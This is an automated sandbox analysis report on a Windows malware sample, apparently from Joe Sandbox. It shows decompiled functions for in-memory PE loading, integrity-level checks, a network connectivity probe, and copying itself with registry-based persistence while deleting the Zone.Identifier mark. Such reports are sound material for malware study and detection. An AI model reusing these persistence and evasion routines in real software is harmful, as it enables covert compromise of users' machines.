                                      • Associated: 00000000.00000002.424518494.013A5000.00000008.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.424528540.013A7000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.424539586.013A9000.00000008.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.424554021.013AD000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.424563735.013AE000.00000008.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.424574199.013B1000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.424583869.013B3000.00000002.00020000.sdmp Download File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_12e0000_4ifN8B061M.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: api-ms-$ext-ms-
                                      • API String ID: 0-537541572
                                      • Opcode ID: 9e64fab638b068566006534c384a280553b1cca18ebbc4f3781a2b25c95f7841
                                      • Instruction ID: 69a6707cb8dc51079201c48ec9604aeb01d28e6b7ea495ef912a257a5d736c67
                                      • Opcode Fuzzy Hash: 9e64fab638b068566006534c384a280553b1cca18ebbc4f3781a2b25c95f7841
                                      • Instruction Fuzzy Hash: 7621EE75E21216ABDF3247299C9DB5F77E89F51F60F940215EF05A7285EA70EC0087D0
                                      Uniqueness

                                      Uniqueness Score: 3.32%

                                      Function 012F1106, Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 38networkUNIQUE
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 1130 12f1106-12f1135 WSAStartup socket 1131 12f113c-12f1176 inet_addr htons connect 1130->1131 1132 12f1137-12f7a10 1130->1132 1134 12f117f 1131->1134 1135 12f1178 1131->1135 1134->1130 1135->1134
                                      APIs
                                      • WSAStartup.WS2_32(00000202,?), ref: 012F1119
                                      • socket.WS2_32(00000002,00000001,00000006), ref: 012F1128
                                      • inet_addr.WS2_32(8.8.8.8), ref: 012F114A
                                      • htons.WS2_32(00000035), ref: 012F1155
                                      • connect.WS2_32(FFFFFFFF,?,00000010), ref: 012F1169
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.424346882.012E1000.00000020.00020000.sdmp, Offset: 012E0000, based on PE: true
                                      • Associated: 00000000.00000002.424335940.012E0000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.424399292.01302000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.424424990.0130B000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.424434447.0130C000.00000008.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.424444007.0130D000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.424454583.0130F000.00000008.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.424487286.013A0000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.424497060.013A1000.00000008.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.424508147.013A4000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.424518494.013A5000.00000008.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.424528540.013A7000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.424539586.013A9000.00000008.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.424554021.013AD000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.424563735.013AE000.00000008.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.424574199.013B1000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.424583869.013B3000.00000002.00020000.sdmp Download File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_12e0000_4ifN8B061M.jbxd
                                      Similarity
                                      • API ID: Startupconnecthtonsinet_addrsocket
                                      • String ID: 8.8.8.8
                                      • API String ID: 4117409672-3817307869
                                      • Opcode ID: 6d1d7e979713a0dbf45f8f96c08fa7b28881de633a2bb20627c4ea302a633209
                                      • Instruction ID: 74b49b8e37f711cba0bc217f0d2847ccc7e62c1b12ccdf4e6ad1e6f46c38a29f
                                      • Opcode Fuzzy Hash: 6d1d7e979713a0dbf45f8f96c08fa7b28881de633a2bb20627c4ea302a633209
                                      • Instruction Fuzzy Hash: E201E574D20219DBDB219FE4D84DBEEB678AB08721F00832AEA31662D5D3B40551DF51
                                      Uniqueness

                                      Uniqueness Score: 100.00%

                                      Function 012EB50D, Relevance: 9.2, APIs: 6, Instructions: 197COMMONLIBRARYCODE
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 1137 12eb50d-12eb526 1138 12eb53c-12eb541 1137->1138 1139 12eb528-12eb538 call 12ede58 1137->1139 1141 12eb54e-12eb574 MultiByteToWideChar 1138->1141 1142 12eb543-12eb54b 1138->1142 1139->1138 1146 12eb53a 1139->1146 1144 12eb6ce-12eb6e1 call 12e1c5e 1141->1144 1145 12eb57a-12eb586 1141->1145 1142->1141 1147 12eb5bd 1145->1147 1148 12eb588-12eb58d 1145->1148 1146->1138 1150 12eb5bf-12eb5c1 1147->1150 1151 12eb58f-12eb598 call 12f0380 1148->1151 1152 12eb5a2-12eb5ad call 12e6edf 1148->1152 1154 12eb5c7-12eb5d8 MultiByteToWideChar 1150->1154 1155 12eb6c3 1150->1155 1164 12eb59a-12eb5a0 1151->1164 1165 12eb5b8-12eb5bb 1151->1165 1152->1165 1166 12eb5af 1152->1166 1154->1155 1158 12eb5de-12eb5f0 call 12e6656 1154->1158 1159 12eb6c5-12eb6cc call 12e9a9e 1155->1159 1168 12eb5f5-12eb5f9 1158->1168 1159->1144 1167 12eb5b5 1164->1167 1165->1150 1166->1167 1167->1165 1168->1155 1170 12eb5ff-12eb607 1168->1170 1171 12eb609-12eb60e 1170->1171 1172 12eb641-12eb64d 1170->1172 1171->1159 1175 12eb614-12eb616 1171->1175 1173 12eb67e 1172->1173 1174 12eb64f-12eb651 1172->1174 1178 12eb680-12eb682 1173->1178 1176 12eb666-12eb671 call 12e6edf 1174->1176 1177 12eb653-12eb65c call 12f0380 1174->1177 1175->1155 1179 12eb61c-12eb636 call 12e6656 1175->1179 1182 12eb6bc-12eb6c2 call 12e9a9e 1176->1182 1192 12eb673 1176->1192 1177->1182 1190 12eb65e-12eb664 1177->1190 1178->1182 1183 12eb684-12eb69d call 12e6656 1178->1183 1179->1159 1194 12eb63c 1179->1194 1182->1155 1183->1182 1196 12eb69f-12eb6a6 1183->1196 1195 12eb679-12eb67c 1190->1195 1192->1195 1194->1155 1195->1178 1197 12eb6a8-12eb6a9 1196->1197 1198 12eb6e2-12eb6e8 1196->1198 1199 12eb6aa-12eb6ba WideCharToMultiByte 1197->1199 1198->1199 1199->1182 1200 12eb6ea-12eb6f1 call 12e9a9e 1199->1200 1200->1159
                                      APIs
                                      • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,012E4206,012E4206,?,?,?,012EB727,00000001,00000001,77E85006), ref: 012EB567
                                      • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,00000000,?,?,?,012EB727,00000001,00000001,77E85006,?,?,?), ref: 012EB5D0
                                      • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,77E85006,00000000,00000000,?,?,00000000,?,00000000,00000000,00000000,00000000), ref: 012EB6B0
                                      • __freea.LIBCMT ref: 012EB6BD
                                        • Part of subcall function 012E6EDF: HeapAlloc.KERNEL32(00000000,?,?,?,012E852B,00001000,?,?,?,?,012E3843), ref: 012E6F11
                                      • __freea.LIBCMT ref: 012EB6C6
                                      • __freea.LIBCMT ref: 012EB6EB
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.424346882.012E1000.00000020.00020000.sdmp, Offset: 012E0000, based on PE: true
                                      • Associated: 00000000.00000002.424335940.012E0000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.424399292.01302000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.424424990.0130B000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.424434447.0130C000.00000008.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.424444007.0130D000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.424454583.0130F000.00000008.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.424487286.013A0000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.424497060.013A1000.00000008.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.424508147.013A4000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.424518494.013A5000.00000008.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.424528540.013A7000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.424539586.013A9000.00000008.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.424554021.013AD000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.424563735.013AE000.00000008.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.424574199.013B1000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.424583869.013B3000.00000002.00020000.sdmp Download File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_12e0000_4ifN8B061M.jbxd
                                      Similarity
                                      • API ID: ByteCharMultiWide__freea$AllocHeap
                                      • String ID:
                                      • API String ID: 3147120248-0
                                      • Opcode ID: d5cb2c50db619e2c472be08fee15eed7024fb3530ca8ec083a7672aedc923f8d
                                      • Instruction ID: 3a3813655377e1cec37c0c27a745b38bc1152287db4bbb133b53468fe3ab36a3
                                      • Opcode Fuzzy Hash: d5cb2c50db619e2c472be08fee15eed7024fb3530ca8ec083a7672aedc923f8d
                                      • Instruction Fuzzy Hash: DC518D72620217AFEB259F68DC89EBB3BE9EF54750F954129FA04A7250D770DC108BA0
                                      Uniqueness

                                      Uniqueness Score: 0.04%

                                      Function 0025586A, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 55UNIQUE
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 1203 25586a-25587d GetCommandLineA 1204 2558a7-2558a9 1203->1204 1205 25587f-255884 1203->1205 1208 2558a4-2558a5 1204->1208 1209 2558ab 1204->1209 1206 255897-2558a2 1205->1206 1207 255886 1205->1207 1211 2558b2 1206->1211 1210 255888-25588c 1207->1210 1208->1204 1212 2558b4-2558b6 1209->1212 1210->1206 1213 25588e-255895 1210->1213 1211->1212 1214 2558ad-2558af 1212->1214 1215 2558b8-2558f1 GetStartupInfoA call 2558f8 call 255925 GetModuleHandleA call 2611d0 call 25590d ExitProcess 1212->1215 1213->1206 1213->1210 1214->1215 1216 2558b1 1214->1216 1216->1211
                                      C-Code - Quality: 100%
                                      			E0025586A() {
				struct _STARTUPINFOA _v72;
				intOrPtr _t6;
				int _t11;
				intOrPtr _t15;
				intOrPtr* _t16;
				intOrPtr* _t18;
				intOrPtr _t20;
				void* _t21;

				_t16 = GetCommandLineA();
				_t6 =  *_t16;
				if(_t6 != 0x22) {
					while(1) {
						__eflags = _t6 - 0x20;
						if(_t6 <= 0x20) {
							break;
						}
						_t16 = _t16 + 1;
						__eflags = _t16;
						_t6 =  *_t16;
					}
					L12:
					if(_t6 != 0) {
						__eflags = _t6 - 0x20;
						if(_t6 > 0x20) {
							goto L13;
						}
						_t16 = _t16 + 1;
						__eflags = _t16;
						L11:
						_t6 =  *_t16;
						goto L12;
					}
					L13:
					_t2 =  &(_v72.dwFlags);
					_v72.dwFlags = _v72.dwFlags & 0x00000000;
					GetStartupInfoA( &_v72);
					E002558F8();
					E00255925(0x266000, 0x26602c);
					GetModuleHandleA(0);
					_t11 = E002611D0(0x26602c, _t21,  *_t2, 0x266000, 0x266000); // executed
					E0025590D();
					ExitProcess(_t11);
				}
				_t18 = _t16 + 1;
				_t20 =  *_t18;
				if(_t20 == 0) {
					L5:
					_t1 = _t18 + 1; // 0x3
					_t14 =  !=  ? _t18 : _t1;
					_t16 =  !=  ? _t18 : _t1;
					goto L11;
				}
				_t15 = _t20;
				while(1) {
					_t20 = _t15;
					if(_t15 == 0x22) {
						goto L5;
					}
					_t18 = _t18 + 1;
					_t20 =  *_t18;
					_t15 = _t20;
					if(_t20 != 0) {
						continue;
					}
					goto L5;
				}
				goto L5;
			}











                                      0x00255877
                                      0x00255879
                                      0x0025587d
                                      0x002558a7
                                      0x002558a7
                                      0x002558a9
                                      0x00000000
                                      0x00000000
                                      0x002558a4
                                      0x002558a4
                                      0x002558a5
                                      0x002558a5
                                      0x002558b4
                                      0x002558b6
                                      0x002558ad
                                      0x002558af
                                      0x00000000
                                      0x00000000
                                      0x002558b1
                                      0x002558b1
                                      0x002558b2
                                      0x002558b2
                                      0x00000000
                                      0x002558b2
                                      0x002558b8
                                      0x002558b8
                                      0x002558b8
                                      0x002558c0
                                      0x002558c6
                                      0x002558d5
                                      0x002558dc
                                      0x002558e4
                                      0x002558eb
                                      0x002558f1
                                      0x002558f1
                                      0x0025587f
                                      0x00255880
                                      0x00255884
                                      0x00255897
                                      0x00255897
                                      0x0025589d
                                      0x002558a0
                                      0x00000000
                                      0x002558a0
                                      0x00255886
                                      0x00255888
                                      0x00255888
                                      0x0025588c
                                      0x00000000
                                      0x00000000
                                      0x0025588e
                                      0x0025588f
                                      0x00255891
                                      0x00255895
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x00255895
                                      0x00000000

                                      APIs
                                      • GetCommandLineA.KERNEL32 ref: 00255871
                                      • GetStartupInfoA.KERNEL32(?), ref: 002558C0
                                      • GetModuleHandleA.KERNEL32(00000000), ref: 002558DC
                                      • ExitProcess.KERNEL32 ref: 002558F1
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.424095892.00251000.00000020.00000001.sdmp, Offset: 00250000, based on PE: true
                                      • Associated: 00000000.00000002.424087091.00250000.00000004.00000001.sdmp Download File
                                      • Associated: 00000000.00000002.424120535.00262000.00000002.00000001.sdmp Download File
                                      • Associated: 00000000.00000002.424130627.00266000.00000004.00000001.sdmp Download File
                                      • Associated: 00000000.00000002.424138873.00268000.00000002.00000001.sdmp Download File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_250000_4ifN8B061M.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: CommandExitHandleInfoLineModuleProcessStartup
                                      • String ID: ,`&
                                      • API String ID: 2164999147-2045151436
                                      • Opcode ID: 0f8db09f4be5f86d1bfb2ca7431e3cc31cb1f76d65ee485a2bfedf1eab54398e
                                      • Instruction ID: fad51ad3569db3e559cbe2e754c7691777136dea6c013e4007f4d8dfaf454ab2
                                      • Opcode Fuzzy Hash: 0f8db09f4be5f86d1bfb2ca7431e3cc31cb1f76d65ee485a2bfedf1eab54398e
                                      • Instruction Fuzzy Hash: AB014E24028D555FEB241F78A4AE2E83B5A9F07316F141098E985C7213C63B4CEF8A5D
                                      Uniqueness

                                      Uniqueness Score: 100.00%

                                      Function 0025EBD4, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 21libraryloaderCOMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 1225 25ebd4-25ebf8 GetModuleHandleA GetProcAddress 1226 25ec02-25ec07 1225->1226 1227 25ebfa-25ec00 IsWow64Process 1225->1227 1227->1226
                                      C-Code - Quality: 40%
                                      			E0025EBD4(intOrPtr* __ecx) {
				signed int _v8;
				_Unknown_base(*)()* _t6;
				intOrPtr* _t12;

				_push(__ecx);
				_v8 = _v8 & 0x00000000;
				_t12 = __ecx;
				_t6 = GetProcAddress(GetModuleHandleA("kernel32"), "IsWow64Process");
				if(_t6 != 0) {
					 *_t6( *_t12,  &_v8); // executed
				}
				return _v8;
			}






                                      0x0025ebd7
                                      0x0025ebd8
                                      0x0025ebe7
                                      0x0025ebf0
                                      0x0025ebf8
                                      0x0025ec00
                                      0x0025ec00
                                      0x0025ec07

                                      APIs
                                      • GetModuleHandleA.KERNEL32(kernel32,IsWow64Process,?,?,?,0025DC08,?,?,00252BBD,?,00262608,?,?,00000000,?), ref: 0025EBE9
                                      • GetProcAddress.KERNEL32(00000000,?,0025DC08,?,?,00252BBD,?,00262608,?,?,00000000,?), ref: 0025EBF0
                                      • IsWow64Process.KERNEL32(?,00000000,?,0025DC08,?,?,00252BBD,?,00262608,?,?,00000000,?), ref: 0025EC00
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.424095892.00251000.00000020.00000001.sdmp, Offset: 00250000, based on PE: true
                                      • Associated: 00000000.00000002.424087091.00250000.00000004.00000001.sdmp Download File
                                      • Associated: 00000000.00000002.424120535.00262000.00000002.00000001.sdmp Download File
                                      • Associated: 00000000.00000002.424130627.00266000.00000004.00000001.sdmp Download File
                                      • Associated: 00000000.00000002.424138873.00268000.00000002.00000001.sdmp Download File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_250000_4ifN8B061M.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: AddressHandleModuleProcProcessWow64
                                      • String ID: IsWow64Process$kernel32
                                      • API String ID: 1818662866-3789238822
                                      • Opcode ID: 83d17d8ea097c33d72840b4f1078eea81333bbee4d7552a5329b27e9e1de0d75
                                      • Instruction ID: 45b1a784e822205707da9e2bae52a9f99b224ede230f945666cdfefaae2f8592
                                      • Opcode Fuzzy Hash: 83d17d8ea097c33d72840b4f1078eea81333bbee4d7552a5329b27e9e1de0d75
                                      • Instruction Fuzzy Hash: B3E08C71610204FBDB28AB94ED0EB9E76BCEB02352B204588F506E2180DAB4EB14C6A4
                                      Uniqueness

                                      Uniqueness Score: 2.28%

                                      Function 0023002D, Relevance: 7.9, APIs: 5, Instructions: 392memoryCOMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 1228 23002d-23009e call 230467 * 6 1241 2300a0-2300a2 1228->1241 1242 2300a7-2300b0 1228->1242 1243 23045f-230466 1241->1243 1242->1241 1244 2300b2-2300b6 1242->1244 1244->1241 1245 2300b8-2300c2 1244->1245 1246 2300e6-230107 GetNativeSystemInfo 1245->1246 1247 2300c4-2300c7 1245->1247 1246->1241 1249 230109-230133 VirtualAlloc 1246->1249 1248 2300c9-2300cf 1247->1248 1250 2300d1-2300d4 1248->1250 1251 2300d6 1248->1251 1252 230135-23013d 1249->1252 1253 23016c-230176 1249->1253 1256 2300d9-2300e4 1250->1256 1251->1256 1257 23013f-230142 1252->1257 1254 2301b0-2301c1 1253->1254 1255 230178-23017d 1253->1255 1259 2301c3-2301dd LoadLibraryA 1254->1259 1260 230240-23024c 1254->1260 1258 230181-230194 1255->1258 1256->1246 1256->1248 1261 230144-23014c 1257->1261 1262 23015d-23015f 1257->1262 1264 230196-23019f 1258->1264 1265 2301a5-2301aa 1258->1265 1268 2301df 1259->1268 1269 23022e-23023a 1259->1269 1266 230252-230269 1260->1266 1267 2302fc-230306 1260->1267 1261->1262 1270 23014e-230151 1261->1270 1263 230161-230166 1262->1263 1263->1257 1271 230168 1263->1271 1264->1264 1275 2301a1 1264->1275 1265->1258 1277 2301ac 1265->1277 1266->1267 1276 23026f-23027f 1266->1276 1273 2303c3-2303d8 call 260e1e 1267->1273 1274 23030c-230313 1267->1274 1278 2301e3-2301e7 1268->1278 1269->1259 1272 23023c 1269->1272 1279 230153-230156 1270->1279 1280 230158-23015b 1270->1280 1271->1253 1272->1260 1304 2303da-2303df 1273->1304 1281 230315-23031e 1274->1281 1275->1265 1282 2302e1-2302f2 1276->1282 1283 230281-230285 1276->1283 1277->1254 1284 230207-230211 GetProcAddress 1278->1284 1285 2301e9 1278->1285 1279->1262 1279->1280 1280->1263 1288 230324-23033e 1281->1288 1289 2303b8-2303bd 1281->1289 1282->1276 1287 2302f8 1282->1287 1290 230286-230295 1283->1290 1286 230213-230228 1284->1286 1285->1284 1292 2301eb-230205 1285->1292 1286->1278 1293 23022a 1286->1293 1287->1267 1294 230340-230342 1288->1294 1295 230358-23035a 1288->1295 1289->1273 1289->1281 1296 230297-23029b 1290->1296 1297 23029d-2302a6 1290->1297 1292->1286 1293->1269 1298 230344-230349 1294->1298 1299 23034b-23034e 1294->1299 1302 230373-230375 1295->1302 1303 23035c-23035e 1295->1303 1296->1297 1300 2302a8-2302ad 1296->1300 1301 2302cf-2302d3 1297->1301 1308 230350-230356 1298->1308 1299->1308 1309 2302c0-2302c3 1300->1309 1310 2302af-2302be 1300->1310 1301->1290 1305 2302d5-2302dd 1301->1305 1306 230377 1302->1306 1307 23037c-230381 1302->1307 1311 230360-230362 1303->1311 1312 230364-230366 1303->1312 1313 2303e1-2303e5 1304->1313 1314 23045d 1304->1314 1305->1282 1316 230379-23037a 1306->1316 1317 230384-2303ae VirtualProtect 1307->1317 1308->1317 1309->1301 1318 2302c5-2302cb 1309->1318 1310->1301 1311->1316 1312->1302 1315 230368-23036a 1312->1315 1313->1314 1319 2303e7-2303f1 1313->1319 1314->1243 1315->1317 1321 23036c-230371 1315->1321 1316->1317 1317->1241 1322 2303b4 1317->1322 1318->1301 1319->1314 1320 2303f3-2303f7 1319->1320 1320->1314 1323 2303f9-23040a 1320->1323 1321->1317 1322->1289 1323->1314 1324 23040c-230411 1323->1324 1325 230413-230420 1324->1325 1325->1325 1326 230422-230426 1325->1326 1327 230428-23043a 1326->1327 1328 23043e-230444 1326->1328 1327->1324 1329 23043c 1327->1329 1328->1314 1330 230446-23045c 1328->1330 1329->1314 1330->1314
                                      APIs
                                      • GetNativeSystemInfo.KERNEL32(?,?,?,?,00230005), ref: 002300EB
                                      • VirtualAlloc.KERNEL32(00000000,?,00003000,00000004,?,?,?,00230005), ref: 00230113
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.424063177.00230000.00000040.00000001.sdmp, Offset: 00230000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_230000_4ifN8B061M.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: AllocInfoNativeSystemVirtual
                                      • String ID:
                                      • API String ID: 2032221330-0
                                      • Opcode ID: 473b58f7a167e2a1e580efbb33301050c8c34e0b7915a5bdb1048dcc05cabd4f
                                      • Instruction ID: 8400531d4e859b795de2b68d5a8155b9afe1dc6f3f63c2ca614c803666e302fa
                                      • Opcode Fuzzy Hash: 473b58f7a167e2a1e580efbb33301050c8c34e0b7915a5bdb1048dcc05cabd4f
                                      • Instruction Fuzzy Hash: 56E1D0B1A143068FDB24CF69C8E472AB3E0FF94308F18456DE9859B241E774ED65CBA1
                                      Uniqueness

                                      Uniqueness Score: 2.84%

                                      Function 0025DB97, Relevance: 6.0, APIs: 4, Instructions: 37COMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 1333 25db97-25dbb8 GetCurrentProcess OpenProcessToken 1334 25dbda-25dbde 1333->1334 1335 25dbba-25dbd6 GetTokenInformation 1333->1335 1336 25dbe0-25dbe3 CloseHandle 1334->1336 1337 25dbe9-25dbf2 1334->1337 1335->1334 1336->1337
                                      C-Code - Quality: 100%
                                      			E0025DB97() {
				void* _v8;
				long _v12;
				void _v16;
				long _t21;
				void* _t22;

				_t22 = 0;
				_v8 = 0;
				if(OpenProcessToken(GetCurrentProcess(), 8,  &_v8) != 0) {
					_t21 = 4;
					_v12 = _t21;
					GetTokenInformation(_v8, 0x14,  &_v16, _t21,  &_v12); // executed
					_t22 =  !=  ? _v16 : 0;
				}
				if(_v8 != 0) {
					CloseHandle(_v8); // executed
				}
				return 0 | _t22 != 0x00000000;
			}








                                      0x0025dba1
                                      0x0025dba6
                                      0x0025dbb8
                                      0x0025dbbc
                                      0x0025dbc0
                                      0x0025dbce
                                      0x0025dbd6
                                      0x0025dbd6
                                      0x0025dbde
                                      0x0025dbe3
                                      0x0025dbe3
                                      0x0025dbf2

                                      APIs
                                      • GetCurrentProcess.KERNEL32(00000008,00000000,?,?,?,00000000), ref: 0025DBA9
                                      • OpenProcessToken.ADVAPI32(00000000,?,?,?,00000000), ref: 0025DBB0
                                      • GetTokenInformation.KERNELBASE(00000000,00000014(TokenIntegrityLevel),?,00000004,?,?,?,?,00000000), ref: 0025DBCE
                                      • CloseHandle.KERNEL32(00000000), ref: 0025DBE3
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.424095892.00251000.00000020.00000001.sdmp, Offset: 00250000, based on PE: true
                                      • Associated: 00000000.00000002.424087091.00250000.00000004.00000001.sdmp Download File
                                      • Associated: 00000000.00000002.424120535.00262000.00000002.00000001.sdmp Download File
                                      • Associated: 00000000.00000002.424130627.00266000.00000004.00000001.sdmp Download File
                                      • Associated: 00000000.00000002.424138873.00268000.00000002.00000001.sdmp Download File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_250000_4ifN8B061M.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: ProcessToken$CloseCurrentHandleInformationOpen
                                      • String ID:
                                      • API String ID: 215268677-0
                                      • Opcode ID: 229e792119cab149fe86b53375ac612e76efc751ff740b38e3b3adabaed8460c
                                      • Instruction ID: 8fa358a739c52c026860c1883f57eb0053e8f79d7aa2d537132ff5bf3140dbd5
                                      • Opcode Fuzzy Hash: 229e792119cab149fe86b53375ac612e76efc751ff740b38e3b3adabaed8460c
                                      • Instruction Fuzzy Hash: A8F0E771A00618FBDB119FA0AD09BDEBBBCEF04745F118065E901A60A0D7709E58DA90
                                      Uniqueness

                                      Uniqueness Score: 0.13%

                                      Function 0025F0C8, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 164fileUNIQUE
                                      Download Yara Rule

                                      Control-flow Graph

                                      C-Code - Quality: 96%
                                      			E0025F0C8(intOrPtr* __ecx, void* __eflags, WCHAR* _a4, char _a8) {
				WCHAR* _v8;
				char _v12;
				char _v16;
				char _v20;
				void* _t49;
				void* _t52;
				void* _t61;
				void* _t67;
				void* _t73;
				void* _t79;
				int _t82;
				int _t91;
				char* _t95;
				intOrPtr* _t131;
				WCHAR** _t135;
				void* _t136;
				void* _t138;

				_t138 = __eflags;
				_t131 = __ecx;
				E0025D425( &_v8); // executed
				_t130 = 0xa;
				_t95 =  &_v20;
				E002532D4(_t95, _t130, _t138); // executed
				_push(_t95);
				_push(_t95);
				_t49 = E0025EF0C(_t131, _t95, _t131 + 0x10); // executed
				E0025EF4C(_t131);
				_t91 = 0;
				if(_t49 == 0) {
					L4:
					_t133 = _t131 + 0x10;
					goto L5;
				} else {
					_t140 = _a4;
					if(_a4 == 0) {
						goto L4;
					} else {
						_t130 =  *((intOrPtr*)(_t131 + 0xc));
						_t135 = _t131 + 0x20;
						_t73 = E0025D75B( &_v12,  *((intOrPtr*)(_t131 + 0xc)), _t140); // executed
						E00253264(_t135, _t73); // executed
						E0025D70F(E00255A2D(_v12), _t135);
						E0025345A( &_v12, _t131 + 0x4c); // executed
						_t79 = E00253297(_t135,  *((intOrPtr*)(_t131 + 0xc)), _t140, "\\"); // executed
						E00253162(_t79, _t140,  &_v12); // executed
						_t123 = _v12;
						E00255A2D(_v12);
						_t82 = CopyFileW(_v8,  *_t135, 0); // executed
						if(_t82 != 0) {
							_t124 = _t135;
							E0025304E(_t135, _t130, _t136);
							E002554A5(_t131 + 0x30, _t130, _t136);
							E00255C32( &_v16, _t130, _t124, _t124, _t123, _t123);
							_t133 = _t131 + 0x10;
							E0025EFFE(_t131, 0x80000001, _t131 + 0x10, 0xf003f, 0); // executed
							E0025EFCB(_t131, _t131 + 0x18,  &_v16, 3); // executed
							E00252E66( &_v16);
							L5:
							if( *_t131 == _t91) {
								E0025EFFE(_t131, 0x80000001, _t133, 0xf003f, _t91);
							}
							if(_a8 == _t91) {
								L13:
								E00253412( &_a4,  *(_t131 + 0x20)); // executed
								_t52 = E00253412( &_a8, L":Zone.Identifier"); // executed
								E00253162( &_a4, _t146, _t52); // executed
								E00255A2D(_a8);
								DeleteFileW(_a4); // executed
								_t91 = 1;
								E00255A2D(_a4);
							} else {
								if(_a4 == _t91) {
									E00253264(_t131 + 0x20,  &_v8);
								}
								_t61 = E0025EFFE(_t131 + 4,  *((intOrPtr*)(_t131 + 8)), _t131 + 0x14, 0x20006, _t91); // executed
								if(_t61 != 0) {
									E0025345A( &_a4, _t131 + 0x54); // executed
									_t67 = E0025EFCB(_t131 + 4,  &_a4, E00252E0A( &_v16, _t130, _t131 + 0x20), 1); // executed
									E00255A2D(_a4);
									E00252E66( &_v16);
									_t146 = _t67;
									if(_t67 != 0) {
										E0025EF4C(_t131 + 4);
										goto L13;
									}
								}
							}
						}
					}
				}
				E00255A2D(_v20);
				E00255A2D(_v8);
				return _t91;
			}




















                                      0x0025f0c8
                                      0x0025f0d1
                                      0x0025f0d6
                                      0x0025f0dd
                                      0x0025f0de
                                      0x0025f0e1
                                      0x0025f0e6
                                      0x0025f0e7
                                      0x0025f0ef
                                      0x0025f0f8
                                      0x0025f0fd
                                      0x0025f101
                                      0x0025f1c5
                                      0x0025f1c5
                                      0x00000000
                                      0x0025f107
                                      0x0025f107
                                      0x0025f10a
                                      0x00000000
                                      0x0025f110
                                      0x0025f110
                                      0x0025f116
                                      0x0025f119
                                      0x0025f121
                                      0x0025f130
                                      0x0025f13c
                                      0x0025f148
                                      0x0025f153
                                      0x0025f158
                                      0x0025f15b
                                      0x0025f166
                                      0x0025f16e
                                      0x0025f177
                                      0x0025f179
                                      0x0025f184
                                      0x0025f18c
                                      0x0025f194
                                      0x0025f1a5
                                      0x0025f1b6
                                      0x0025f1be
                                      0x0025f1c8
                                      0x0025f1ca
                                      0x0025f1da
                                      0x0025f1da
                                      0x0025f1e2
                                      0x0025f257
                                      0x0025f25d
                                      0x0025f26a
                                      0x0025f273
                                      0x0025f27b
